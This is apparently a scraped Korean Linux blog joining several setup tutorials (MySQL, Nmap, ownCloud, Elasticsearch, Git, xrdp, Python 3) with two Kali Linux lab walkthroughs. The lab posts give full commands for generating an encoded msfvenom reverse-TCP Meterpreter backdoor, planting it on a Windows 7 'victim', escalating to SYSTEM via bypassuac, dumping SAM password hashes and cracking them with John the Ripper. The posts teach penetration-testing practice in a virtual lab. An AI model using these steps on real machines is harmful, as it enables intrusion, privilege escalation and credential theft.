우분투에서 MySQL을 설치하는 방법을 다뤄보려고 합니다.


여기서는 설치가 매우 간단하지만 간과해서는 안 되는 부분이 있습니다.


설치할 이름이 mysql이 아니라 mysql-server라는 점입니다.


설치하는 명령어는 다음과 같습니다.


# apt-get update 

# apt-get install mysql-server 


위의 명령어를 실행하면 쭈욱 설치되다가, 다음과 같은 화면들이 나옵니다.


여기서는 MySQL 루트 비밀번호를 입력하는 부분입니다.



다시 루트 비밀번호를 입력해줍니다.

(잘못썼는지 확인하기 위해서입니다.)



여기서 MySQL 서버를 설치완료했다면 확인해봐야겠지요?



여기서 dpkg --list | grep mysql 을 실행해보면 위와 같은 그림이 나옵니다.



이제 실행되어 있다면 mysql -u root -p 까지 입력하여 실행하고, 비밀번호를 입력하여 들어가봅시다.

잘 들어가졌다면 설치 완료!!





'LINUX > Ubuntu' 카테고리의 다른 글

Ubuntu에서 NMAP 최신 버전 설치하기  (0) 2017.04.29
Ubuntu Owncloud9.x 설치  (0) 2017.03.18

해당 게시글은 kali linux 2017 amd64기준임을 말씀드립니다.

해당 게시글을 보기 전에 필수적으로 Metasploit - Reverse TCP를 이용한 세션 연결이 필요합니다.


실습 환경은 다음과 같습니다.

 구분

내용

 공격자 PC 환경

Kali Linux 2017 amd 64

 피해자 PC 환경

 Windows 7 Pro 32Bit

 가상 환경

 VMware Player(or Workstation)


01. Metasploit BypassUAC Exploit 실습

해당 실습은 Metasploit - Reverse TCP Exploit과 연결되어 진행되는 실습이기 때문에 위의 실습과정 이후 실습을 진행하기 바랍니다.

먼저 exploit을 이미 진행하였다는 가정 하에 meterpreter > 가 띄워져 있다고 가정을 하고 진행하도록 하겠습니다.

다음 명령어를 사용하여 system의 권한을 가져와 권한상승을 시도해보도록 합시다.

명령어는 다음과 같습니다.

meterpreter > getsystem 


getsystem 명령어를 사용해본 결과 실패했다는 문구가 뜨고 변화가 없는 모습을 보여줍니다.

이는 적절한 사전 준비가 되지 않았음을 의미합니다.

여기서 우리는 bypassuac라는 exploit 기법을 이용하여 세션의 힘을 더해줄 필요가 있습니다.




02. Exploit 활용 - bypassuac를 이용한 권한 상승

먼저 다음 명령어를 통해 세션을 background로 보내도록 합니다.

명령어는 다음과 같습니다.

meterpreter > background 



기존의 세션을 백그라운드로 보내면 다시 권한상승을 위한 모듈을 로드해야 합니다.

여기서 필요한 건, bypassuac 모듈과 백그라운드로 보낸 세션의 번호입니다.

사용할 명령어는 다음과 같습니다.

msf exploit(handler) > use exploit/windows/local/bypassuac

msf exploit(bypassuac) > set SESSION 1


우리가 연결했던 세션의 번호가 1이라면, bypassuac에서도 동일하게 해당 세션을 통해 연결을 수행할 계획입니다.

즉, 이미 연결된 세션을 통해 bypassuac의 exploit이 수행된다는 의미입니다.


해당 명령어를 사용하여 bypassuac로 변경한 후, 우리가 사용하고 있었던 sessions 1을 bypassuaac에 설정해줍니다.

그러면 이제 bypassuac도 우리가 연결해두었던 세션을 통해 새로운 기능을 사용할 수 있게 됩니다.

이제 exploit을 진행해보도록 합시다.

명령어는 단순하게 다음과 같습니다.

msf exploit(handler) > exploit 



해당 명령어를 실행하면 새로운 세션이 Default Port를 통해 생성됩니다.

session ID는 2로 생성될 것입니다.

이제 새롭게 생성된 session에서 getsystem을 사용해보도록 합시다.

명령어는 다음과 같습니다.

meterpreter > getsystem



해당 명령어를 실행하면 ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).이라는 문구와 함께 시스템의 권한이 상승되었음을 알려줍니다.

해당 시스템에서 우리의 권한이 어느정도 되는지 확인해보도록 합시다.

명령어는 다음과 같습니다.

meterpreter > getuid

meterpreter > getsid



해당 명령어를 사용하여 권한을 확인해보면 NT AUTHORITY\SYSTEM이 보이면서 S-1-5-18임을 확인 할 수 있습니다.

이는 SYSTEM 권한임을 알려주며, Windows 7에서는 Trusted Installer 다음으로 가장 높은 권한입니다.

즉, Administrator 권한보다 높은 권한으로 많은 기능을 제약없이 사용할 수 있게 되었다는 의미입니다.




03. Exploit 활용 - SAM 내부에 있는 Hashdump 추출

SAM 파일은 타겟 윈도우 시스템의 사용자의 계정명과 패스워드 해시를 저장하는 파일입니다.

원래는 Administrator 권한이더라도 해당 SAM 파일에 대한 읽기 권한, 쓰기 권한이 존재하지 않습니다.

하지만 해당 파일에는 우리가 원하는 계정명과 Hash 등의 정보가 있기 때문에 이 파일에 접근해야 하니다.

단, 이는 반드시 권한상승이 되어 있는 상태에서 가능한 실습입니다.

때문에 위의 실습을 모두 마치고 진행해야 합니다.


다음 명령어를 통해 SAM 파일에 있는 Hashdump를 사용하여 해당 정보를 가져오도록 합시다.

meterpreter > run post/windows/gather/hashdump 



해당 명령어를 사용하면 각 계정별 Hash 값 및 계정 정보를 얻을 수 있습니다. 이제 해당 값을 복사하여 크랙을 시작하도록 합시다.


04. Exploit - john the ripper를 이용한 크랙

이제 우리가 사용할 프로그램은 john the ripper라는 프로그램으로 Hashdump 파일을 크랙하기 위해 필요한 프로그램입니다.

위의 두 파일은 우리가 크랙하기 위한 Windows Hashdump 파일과 사전공격(Dictionary Attack)을 위한 사전 파일입니다.

Hashdump 파일을 살펴보면 세 개의 계정에 대한 정보가 나타나 있는 것을 볼 수 있습니다.


다음 명령을 통해 Hashdump파일을 크랙하도록 합시다.

 파일

설명

 HashFile.txt

 해쉬 덤프를 저장한 파일

 PW.txt

 패스워드 사전 공격에 필요한 데이터를 저장한 파일


명령어는 다음과 같습니다.

~# john /root/Desktop/HashFile.txt -format=NT -wordlist=/root/Desktop/PW.txt  



PW.txt에는 해당 해쉬값의 정답이 들어있기 때문에 0초밖에 걸리지 않았다고 하지만, 실제로는 매우 오래 걸리는 작업입니다.


여기까지 실습을 마치도록 하겠습니다.


'LINUX > Kali Linux' 카테고리의 다른 글

Metasploit - Reverse TCP를 이용한 PC원격 조종  (2) 2017.07.16

해당 게시글은 kali linux 2017 amd64기준임을 말씀드립니다.


실습 환경은 다음과 같습니다.

 구분

내용

 공격자 PC 환경

Kali Linux 2017 amd 64

 피해자 PC 환경

 Windows 7 Pro 32Bit

 가상 환경

 VMware Player(or Workstation)


01. Metasploit 익스플로잇 파일 생성


Metasploit 익스플로잇 파일 생성 명령어는 다음과 같습니다.

~# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai 0i 5 -b '\x00' LHOST=[공격자 IP] LPORT=[우리가 원하는 포트] -f exe > [파일이름]


metasploit은 변경사항 때문에 명령어가 많이 달라졌습니다.

달라진 명령어는 msfvenom으로 되어있습니다.

명령어가 잘 안 보일 수 있기 때문에 아래에 추가적인 설명과 함께 Text로 작성해보았습니다.


msfvenom에서 x86/shikata_ga_nai를 사용하는 이유는 아래의 그림과 같아서 그렇습니다.

아래의 그림을 보면 Name, Rank, Description으로 구분되어 있는데, 해당 그림에서 Rank를 살펴보면 good, manual, low, normal, excellent 등으로 구분되어 있습니다.

우리는 이 중에서 excellent로 되어있는 encoder를 사용하도록 해야 합니다.

metasploit에서 인코더에 대한 정보를 검색하기 위한 명령어는 다음과 같습니다.

~# msfvenom -l encolders



msfvenom 명령어에 대한 각각의 설명은 아래와 같습니다.

명령어(옵션)

내용

 -p windows/meterpreter/reverse_tcp

reverse_tcp로 된 meterpreter를 payload에 사용함

 -e x86/shikata_ga_nai

인코더는 x86/shikata_ga_nai를 사용함

 -i 5 -b '\00'

쓸 데 없는 char를 지우기 위함임

 LPORT=[우리가 원하는 포트]

Default 포트(meterpreter에서 사용되는 포트)의 숫자는 4444이다.




02. Metasploit Reverse TCP Exploit 실습

msfvenom 명령어를 통해 파일을 생성하며, 그 파일을 통해 Reverse TCP Exploit 실습을 진행하도록 합니다.

생성된 파일을 피해자 PC인 Windows 7 시스템에 옮기도록 합니다.

여기서 옮긴 파일의 이름은 Intel_HackerFile.exe 파일입니다.

만약 공격자의 프로그램이 피해자 시스템에서 실행될 때 두 가지 상태를 관찰할 수 있습니다.

첫 번째로, 공격자 PC에서 아무런 조치 없이 실행을 시키게 되면 아무런 일이 일어나지 않은 채 5초 후 꺼지게 됩니다.

두 번째로, 공격자 PC에서 연결 상태를 관찰하는 설정이 되어있으면, 실행시 바로 공격자와 연결됩니다.

때문에 먼저 Exploit 파일을 실행하기 앞서 공격자 PC에서 적절한 설정이 필요합니다.




03. Exploit 설정 - reverse_tcp

먼저 공격자 PC에서 msfconsole이라는 명령을 통해 metasploit 콘솔 창을 열도록 합니다.

msfconsole을 열기 위한 명령어는 다음과 같습니다.

~# msfconsole


아래의 그림은 msfconsole을 입력하고 콘솔 창을 띄운 그림입니다.

해당 창을 띄웠을 때 그림은 조금 다를 수 있으니 당황하지 않도록 합시다.

이제 msf> 라는 커맨드 창이 있을 것입니다.

해당 커맨드 창에서 각종 명령어를 입력합니다.

아래의 그림은 reverse_tcp 익스플로잇 설정을 말합니다.

reverse_tcp를 사용하기 위해서는 다음과 같은 명령어를 입력해주어야 합니다.

msf > use exploit/multi/handler

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp

msf exploit(handler) > set LHOST [피해자 IP]

msf exploit(handler) > set LPORT [프로그램에 작성했던 포트 번호]

msf exploit(handler) > set ExitOnSession false


우리가 백도어로써 사용하는 방법이 reverse_tcp 기법을 이용한 exploit힙니다.

여기까지 설정하고, exploit을 시작하는 명령을 실행하면 공격자는 피해자와 연결하기 위한 준비를 모두 마치게 됩니다.

즉, 공격자는 피해자가 프로그램을 실행하도록 기다리는 상태라고 할 수 있습니다.




04. Exploit 실행 - reverse_tcp

아래의 그림은 reverse_tcp 익스플로잇 실행 후 상태를 보여주는 그림입니다.

exploit 명령어는 다음과 같습니다.

msf exploit(handler) > exploit -j -z 


위의 그림 상태는 우리가 Windows 7 시스템에 심어두었던 파일이 실행되기를 기다리고 있는 상태입니다.

이제 프로그램을 실행시켜보도록 합시다.

프로그램을 실행시키면 위의 그림과 같이 session이 연결되었다는 문구가 나옵니다.

해당 문구를 그림으로 설명해보자면 아래와 같습니다.

공격자의 IP는 192.168.37.131입니다.

피해자의 IP는 192.168.37.132입니다.

여기서 공격자가 피해자 시스템에 넣어둔 프로그램을 통해 Reverse TCP Session이 생성되었습니다.


여기까지 성공했다면, 내부적으로 공격자의 PC와 피해자의 PC가 연결되어 있는 상태입니다.

이때 연결되어 있는 Reverse TCP Session을 살펴보는 명령어를 이용하여 살펴보면 다음과 같습니다.

연결상태를 확인하는 명령어와 연결을 사용하기 위한 명령어는 다음과 같습니다.

msf exploit(handler) > show sessions

msf exploit(handler) > sessions -i 1


세션을 살펴보는 명령어는 show sessions라는 명령어로, 지금 공격자의 PC와 연결된 세션들을 모두 나열해줍니다.

sessions -i 1은 1번 ID를 가지고 있는 세션을 연결(실행)하는 명령어입니다.


마지막으로 meterpreter > 가 띄워지면 성곡적으로 피해자 PC에 접근이 된 상태라고 할 수 있습니다.


05. Exploit 활용 - reverse_tcp

이제 바탕화면에 디렉토리를 생성해보고, 생성이 되었는지 확인해보도록 합니다.

아래의 명령어 세 가지를 통해 디렉토리가 잘 생성되었는지 확인해봅시다.

meterpreter > pwd

meterpreter > mkdir [폴더 이름]

meterpreter > ls -l



이제 우리가 가지고 있는 파일을 해당 디렉토리에 업로드해보도록 합시다.

업로드하는 명령어는 다음과 같습니다.

meterpreter > cd [생성한 폴더 이름]

meterpreter > upload [절대경로 및 파일이름]

meterpreter > ls -l



업로드 한 파일의 이름은 You_are_Hacked.PNG 파일이고 해당 파일은 /root/Desktop/HackedMessage 디렉토리 내부에 있습니다.

현재 Terminal 창은 /root 디렉토리에서 켜졌습니다.

그리고 이후 msfconsole을 실행시킨 디렉토리 또한 /root입니다.

때문에 msfconsole이 가지고 있는 경로의 시작점은 /root이기 때문에 하위의 디렉토리는 모두 입력해줘야 합니다.


이제 우리는 해당 파일이 잘 업로드 되었는지 피해자 PC를 통해 확인해보도록 합시다.

파일이 잘 올라갔습니다.

미션 Success!!





CentOS7에서 ElasticSearch를 설치하는 법을 다뤄볼 것입니다. ElasticSearch.5.4.0의 버전을 기준으로 할 것입니다.



01. JAVA 설치

자바(JAVA)가 설치되었는지 확인해볼 필요가 있습니다. 다음 명령어로 JAVA를 확인해보도록 합시다.

# yum update

# cd /opt

# wget --no-cookies --no-check-certificate --header "Cookie: gpw_e24=http%3A%2F%2Fwww.oracle.com%2F; oraclelicense=accept-securebackup-cookie" "http://download.oracle.com/otn-pub/java/jdk/8u102-b14/jre-8u102-linux-x64.rpm"

#rpm -Uvh jre-8u102-linux-x64.rpm

이제 모두 설치가 완료되었다면, 자바의 버전을 확인해보면 됩니다. 이미 설치가 되었다면 아래의 명령어만 사용하면 될 것

# java -version 

버전을 확인하면 [그림 01]과 같이 나타납니다.

[그림 01] java version 확인




02.Enable Elasticsearch Repository(Elasticsearch 설치)

먼저 Elasticsearch의 공개 GPG key를 rpm 패키지 매니저에 import 해야 합니다.

다음 명령어로 import해주도록 합시다.

# rpm --import http://packages.elastic.co/GPg-KEY-elasticsearch 

이제 Elasticsearch에 대한 repo 파일을 만들도록 합시다.


[/etc/yum.repos.d/elasticsearch.repo]

[elasticsearch]

name=Elasticsearch repository

baseurl=http://packages.elastic.co/elasticsearch/2.x/centos

gpgcheck=1

gpgkey=http://packages.elastic.co/GPG-KEY-elasticsearch

enabled=1

이제 elasticsearch package를 이용하여 설치하도록 합시다.

# yum install elasticsearch 

설치를 마지면 [그림 02]와 같이 설명이 나옵니다.

해당 설명에서는 elasticsearch를 설치하고 systemctl을 이용하여 처리를 해야 하는 항목에 대한 설명입니다.

systemctl은 서비스를 조정하는 명령어입니다.

[그림 02] Elasticsearch 설치


# systemctl daemon-reload

# systemctl enable elasticsearch

# systemctl start elasticsearch

해당 명령어는 서비스를 시작하고 사용가능(enable)하도록 하기 위한 명령어입니다.

이제 다음으로 TCP 포트 9200번을 방화벽에서 허용해주도록 합시다.

# firewall-cmd --add-port=9200/tcp

# firewall-cmd --add-port=9200/tcp --permanent 

Elasticsearch가 설치되었다면 간단한 요청을 HTTP로 보내보도록 하여 응답을 받아보도록 합시다.

# curl -X GET http://localhost:9200 

만약 결과가 옳게 나온다면 [그림 03]과 같이 나올 것입니다.

[그림 03] Elasticsearch 설치 확인










NMAP이 기본적으로 설치되는 것은 6.4 버전입니다.

하지만 우리가 원하는 최신의 NMAP을 설치하기 위해서는 다음과 같은 작업을 수행해주셔야 합니다.

여기서는 nmap 7.40 버전을 기준으로 설치룰 수행하였습니다.


01. 사전 작업

먼저 NMAP을 최신 버전으로 다운받을 필요가 있습니다.

NMAP 사이트 : https://nmap.org/download.html

해당 사이트에 들어가면 다음과 같은 링크가 있습니다. 해당 링크에서 파일을 다운로드 받아야 합니다.

[그림 01] Nmap 최신버전(Latest stable Nmap release tarball)


해당 링크를 통해 다운로드 된 파일은 nmap-7.40.tar.bz2라는 이름일 것입니다.(버전은 달라질 수 있습니다.)

이제 다운로드가 된 파일을 통해, 압축해제를 하게 되면 다음과 같이 디렉토리가 생성됩니다.

[그림 02] 생성된 nmap-7.40 디렉토리


nmap-7.40 기준으로 압축을 해제하게 되면, nmap-7.40이라는 디렉토리가 생성되는 것을 확인할 수 있습니다.

이제 해당 디렉토리에 들어가서 terminal을 열어주거나, 터미널을 열어서 해당 디렉토리로 들어가야 합니다.


02. NMAP 설치

압축을 해제한 디렉토리에 들어가면 설치를 위한 파일들이 있을 것입니다.

이제 우리는 configure을 통해 설정파일 스크립트를 실행시켜야 합니다.

이를 통해 문제없이 압축이 잘 해제 되었는지 확인할 수 있습니다.

만약 Error나 Warning을 보게 되면 다시 Nmap 파일을 다운받아 압축해제를 해보도록 합니다.


configure 명령은 다음과 같습니다.

# ./configure 


[그림 03] 설정파일을 통한 체크 완료


설정파일을 통해 체크가 완료되었을 시, [그림 03]과 같이 나타납니다.

이는 NMAP의 configure가 잘 이루어졌다는 것을 의미합니다.

해당 상태까지 잘 진행되었다면, 컴파일을 수행하도록 합니다.

컴파일을 수행하는 명령어는 make이며, 이를 바로 설치하기 위한 명령어는 make install 입니다.

이를 동시에 수행해줄 수 있으며, 명령어는 다음과 같습니다.

  # make && make install


해당 명령어를 통해 install을 진행합니다.

실행은 반드시 sudo 혹은 root 계정으로 진행하도록 합니다.


[그림 04] nmap 7.4설치 완료


이제 설치가 완료되면 nmap을 실행하면 우리가 설치한 최신 버전으로 불러와지게 될 것입니다.



'LINUX > Ubuntu' 카테고리의 다른 글

[Ubuntu] 우분투 16.04 MySQL 설치  (0) 2019.02.24
Ubuntu Owncloud9.x 설치  (0) 2017.03.18

제가 설치한 owncloud의 버전은 9.1.4입니다.

또한 php는 버전이 7이상으로 되어 있기 때문에 명령어가 다릅니다.


01. Apache/MySQL/PHP 설치

먼저 APM을 설치해야 합니다. APM이란 Apache2, PHP, MySQL의 줄임말입니다.

가장 최신의 버전을 추구하는 우리는 업데이트나 설치도 굉장히 최신 녀석을 지향해야 합니다.

설치에 앞서 apt-get을 업데이트 해주도록 합시다.

업데이트와 업그레이드를 모두 수행하기 위한 명령어는 다음과 같습니다.

 # sudo apt-get update

 # sudo apt-get upgrade -y 


업데이트가 완려되었다면, Apache2를 설치하도록 합시다.

Apache2를 설치하는 명령어는 다음과 같습니다.

 # sudo apt-get install apache2 -y 


이제 Apache2가 설치가 잘 완료됐는지 확인해보도록 합시다.

다음과 같은 명령어를 통해 설치가 잘 이루어졌는지 확인할 수 있습니다.

 # sudo apache2ctl configtest 


아마도 다음과 같은 답이 나올 것으로 예상됩니다.

 Output

 Systax OK 


또한, Apache2가 제대로 동작하는지 확인해야 합니다.

다음과 같은 명령어를 사용하여 제대로 동작하는지 확인할 수 있습니다.

 # sudo ufw app list


여기서 ufw는 ubuntu firewall의 줄임말입니다.

해당 명령어의 결과로, 동작하고 있는 어플리케이션의 리스트를 보여줄 것입니다.

 Available applications:

   Apache

   Apache Full

   Apache Secure

   OpenSSH


대략적으로 위와 같은 내용이 나올것입니다.

apache2가 잘 설치되었고 잘 실행이 된 것을 확인했으니, 이제 MySQL을 설치하도록 합시다.

MySQL을 설치하는 명령어는 다음과 같습니다.

 # sudo apt-get install mysql-server -y 


MySQL을 설치하면서 패스워드를 입력하라고 나옵니다.

적당히 잘 입력해주신 후 MySQL을 실행시켜주도록 합시다.

 # mysql -u root -p 


MySQL을 실행하고 우리가 입력했던 패스워드를 입력하면, 우리가 설치한 MySQL로 들어가지게 될 것입니다.

설치가 완료되었음을 확인했으니, exit 명령어를 통해 MySQL의 커맨드 창에서 빠져나도록 합시다.


이제 Apache2와 MySQL을 모두 설치하였습니다.

마지막으로 PHP를 설치하도록 하겠습니다.


PHP의 경우, php5를 더 이상 지원하지 않는다고 합니다.

따라서 설치할 때 php라는 명령어로 모두 통합되었습니다.

여기서 설치할 목록은 php, libapache2-mod-php, php-mcrypt, php-mysql, php-cli를 설치할 것입니다.

 # sudo apt-get install php libapache2-mod-php php-mcrypt php-mysql php-cli -y 


이제 PHP가 설치가 완료되었으니, PHP가 잘 로드될 수 있도록 Apache2를 재시작해줍시다.

 # sudo systemctl restart apache2 




02. owncloud 9.x 설치

owncloud 설치에 앞서 우리는 올바른 owncloud를 설치할 수 있도록 일종의 GPS를 설정해줘야 합니다.

아마 기존의 apt-get update나 upgrade로는 owncloud를 설치할 수 없을 것입니다.

때문에 다음과 같은 설정을 해줘야 합니다.

 # curl https://download.owncloud.org/download/repositories/stable/Ubuntu_16.04/Release.key | sudo apt-key add -

 # echo 'deb http://download.owncloud.org/download/repositories/stable/Ubuntu_16.04/ /' | sudo tee /etc/apt/sources.list.d/owncloud.list


해당 설정은 apt-get에 아직 다운로드 되지 않은 설정입니다.

좌표를 설정해주었으니 이제 update를 해야겠지요.

 # sudo apt-get update 


update가 완료되면 이제 apt-get 명령어로 owncloud를 설치할 수 있을 것입니다.

 # sudo apt-get install owncloud -y


설치는 몇 분 정도 소요될 것입니다. 해당 설치를 완료하고 이제 Apache2를 재시작 해주어야 합니다.

 # sudo systemctl restart apache2 




03. Owncloud 설정

owncloud를 설치했다고 해서 모두 완료된 것이 아닙니다.

owncloud가 사용하는 Database를 설정해주어야 합니다.

다시 MySQL로 들어가보도록 합시다.

  # mysql -u root -p


여기서 owncloud가 사용할 Database를 만들어주어야 합니다.

 mysql > CREATE DATABASE owncloud;


이제 DB가 만들어졌습니다.

DB는 누가 사용할 수 있는지 권한을 만들어주도록 합시다.

 mysql > GRANT ALL ON owncloud.* to '사용자 이름'@'localhost' IDENTIFIED BY '패스워드'; 


처음 우분투를 설치할 때 사용했던 아이디로 해도 괜찮고, root로 해도 괜찮습니다.

저는 처음 설치할 때 사용했던 아이디로 생성했습니다.

 mysql > FLUSH PRIVILEGES;

 mysql > exit


mysql에서 위와 같은 설정을 모두 마쳤다면, 우리가 설치했던 서버로 들어가서 나머지 설정을 완료해주도록 합시다.

 http://서버주소:port/owncloud 



서버로 들어가게 되면 위와 같이 나오게 됩니다.


관리자 계정 만들기는 다음과 같습니다.

 사용자 이름 : [관리자 아이디]

 암호 : [관리자 비밀번호]


데이터베이스를 MySQL/MarialDB로 설정해준다면 자동적으로 데이터 폴더가 /var/www/owncloud/data로 지정될 것입니다.

그리고 이제 데이터베이스 사용자, 암호, 이름을 작성해주도록 합시다.


데이터베이스 사용자는 우리가 owncloud라는 DB에 권한을 주었던 아이디와 암호, 그리고 데이터베이스 이름에는 owncloud라고 작성하도록 합니다.









'LINUX > Ubuntu' 카테고리의 다른 글

[Ubuntu] 우분투 16.04 MySQL 설치  (0) 2019.02.24
Ubuntu에서 NMAP 최신 버전 설치하기  (0) 2017.04.29

이전에 Python3와 원격을 포스팅했었습니다.

이는 모두 Git 최신 버전을 설치하기 위함이었습니다!


이제 Git느님을 영접하기 위해 빨리 원격으로 들어가보도록 합시다.


[그림 01] 원격 데스크톱 화면


원격으로 들어오니 제가 바탕화면에 만들어두었던 디렉토리들이 빼꼼히 인사를 건네내요.

반갑게 맞이해주었습니다.


각설하고 이제 원격이 되었으니, git 최신 버전을 인터넷에서 다운로드 하도록 합시다.



[그림 02] git 최신버전 확인 및 다운로드


Download URL : https://www.kernel.org/pub/software/scm/git/

해당 URL을 들어가면 가장 아래에 있는 최신 git 버전을 다운로드하도록 합시다.

제가 설치한 git은 git-2.12.0.tar.gz로 압축되어 있는 버전입니다.



[그림 03] git 압축 해제


압축 해제하고 git 디렉토리로 들어가보도록 합시다.


해당 디렉토리로 들어가서, 터미널을 열어서 명령어를 쭉 입력해주도록 합시다.


 $ make configure

 $ ./configure --prefix=/usr

 $ make all doc info

 $ sudo make install install-doc install-html install-info 


[그림 04] git 설치 확인






CentOS7에서 다음과 같은 과정을 통해 원격 데스크톱이 지원되도록 만들 수 있습니다.

설치과정은 다음과 같습니다.




01. 필요 도구 설치 및 설정

필요한 도구는 epel, xrdp, tigervnc-server가 있습니다.

저는 epel과 xrdp, tigervnc-server를 나누어서 설치를 수행하였습니다.

먼저 다운로드 하는 명령어는 다음과 같습니다.

 $ yum install epel-release xrdp tigervnc-server


필요한 도구를 모두 설치하셨다면, 원격 설정을 먼저 해주고 서비스를 실행시키도록 합시다.

다음 명령어를 수행하시면 Password와 Verify라는 입력창이 뜹니다.

원하시는 비밀번호를 입력하고 다시 한 번 입력하시면 됩니다.

$ vncpasswd

 Password:********

 Verify:********


설치가 완료되면, 서비스를 시작해주어야 합니다.

설치를 했을 때, 먼저 서비스의 상태를 사용가능으로 바꿔줘야 합니다.

이후 서비스를 실행하도록 합시다.

서비스를 시작하는 명령어는 다음과 같습니다.


서비스 사용가능하게 하는 명령어

 $ systemctl enable xrdp 


서비스 시작 명령어

 $ systemctl start xrdp  


이제 해당 동작이 원활하게 되었는지 확인해보도록 합시다.

다음 명령어를 통해 xrdp 서비스가 잘 실행되고 있는지 확인합니다.

 $ netstat -antup | grep xrdp 


xrdp에 대한 서비스가 몇 개 검색되면 설정이 잘 완료된 것입니다.

다음으로 방화벽을 통해 우리가 원격 데스크톱으로 사용할 서비스 포트를 열어주어야 합니다.

시스템은 우리가 단순히 서비스를 구동한다고 하여 네트워크에 대한 보안을 간과하지 않습니다.




02. 방화벽 설정

우리가 방화벽에서 설정해 줄 것은 원격 데스크톱으로 사용할 포트번호를 방화벽에서 들어올 수 있도록 열어주는 작업입니다

방화벽에서 열어줄 포트를 설정해주는 명령어는 다음과 같습니다.

$ firewall-cmd --permanent --zone=public --add-port=3389/tcp 


만약 Windows에서 사용하신다면 3389로 설정하는 것이 좋습니다.

Windows에서 사용하는 기본 원격 데스크톱 포트번호가 3389이기 때문에 IP만 입력해주시면 바로 원격으로 들어가지게 됩니다.

우리가 사용할 포트번호를 입력하셨다면, 해당 설정을 방화벽에 적용하기 위해 다시 로드해주어야 합니다.

다시 로드하는 명령어는 다음과 같습니다.

$ firewall-cmd --reload 




03. 기타 설정

여기서 우리가 기타로 설정할 수 있는 기능은 [한글화] 및 [포트번호 변경]이 있습니다.

만약 한글 버전으로 원격을 들어가고 싶다면, 다음과 같은 설정을 추가해주면 될 것 같습니다.

 $ vi /etc/xrdp/startwm.sh

.

.

.

export LANG=ko_KR.UTF-8


먼저 /etc/xrdp/startwm.sh를 수정하셔야 하는데, 해당 내용 중에 export LANG이 있습니다.

여기에 한글을 사용하고자 하시는 분은 ko_KR.UTF-8의 내용을 입력해주시면 됩니다.

이후 한글로 보일 것입니다.


또한 포트번호도 변경할 수 있는데, 포트 변경은 보안을 위해 가급적이면 필수적으로 생각하셔야 할 것 같습니다.

포트번호는 접속하기 위해 입력해야 하는 포트번호를 말합니다.

만약 위의 방화벽 설정에서 열린 포트를 3389로 설정하였다면, 해당 포트번호도 3389로 설정해주셔야 합니다.

하지만, 포트번호를 기존의 번호와 다르게 변경하고자 하시면, 반드시 방화벽의 포트번호도 다르게 열어주셔야 합니다.

포트번호는 다음 파일 내에서 변경할 수 있습니다.


$ vi /etc/xrdp/xrdp.ini

.

.

.

port=[원하는 포트 변경]


먼저 /etc/xrdp/xrdp.ini를 열어보시면, port 라는 부분에 우리가 기존의 포트번호가 작성되어 있을 것입니다.

해당 영역의 값을 우리가 원하는 번호로 입력해주셔야 합니다.


04. 원격 접속 방법

윈도우즈에서 원격 데스크톱를 사용할 때 우리는 3389포트를 기본적으로 사용합니다.

만약 방화벽과 포트번호를 3389로 설정하셨다면 원격 데스크톱을 이용하여 IP만 입력하여 접속하시면 됩니다

하지만 우리가 사용할 포트번호를 따로 설정하셨다면, 뒤에 포트번호를 입력해주셔야 합니다.


원격 데스크톱 접속 방법은 다음과 같습니다.

3389로 설정하였을 시 명령어

원격 데스크톱 창 입력 : [아이피] 


3389가 아닌 다른 포트로 입력하였을 시

원격 데스크톱 창 입력 : [아이피] : [우리가 입력한 포트 번호] 



CentOS 7 특성상 파이썬 3버전을 설치하는 데에 어려움이 있습니다.

저도 CentOS 7에 파이썬 3버전을 설치하려고 했는데, 아무런 해결책이 보이지 않았습니다.

그러던 도중 StackOverflow에서 다음과 같은 소스가 저를 구해주었습니다.


01. 파이썬 셋업 툴 설치

먼저 파이썬 셋업툴을 설치해주어야 합니다.

파이썬 셋업툴을 설치하는 명령어는 다음과 같습니다.

$ sudo yum install python34-setuptools 


이를 이용하여 파이썬을 설치하게 되면 파이썬 3.4를 설치할 수 있게 됩니다.




02. 파이썬 pip 설치

이후 파이썬에서 제공하는 easy_install-3.4을 이용하여 pip를 설치해주도록 합니다.

설치 명령어는 다음과 같습니다.

$ sudo easy_install-3.4 pip 


파이썬에서 제공하는 명령어를 사용하기 때문에 yum install을 사용하지 않습니다.




03. 파이썬 설치 확인

위의 두 과정을 통해 설치가 완료되었다면 버전을 확인해보도록 합니다.

파이썬 버전을 확인하는 명령어는 다음과 같습니다.

$ python3 --version 

혹은

$ python3 -V 




+ Recent posts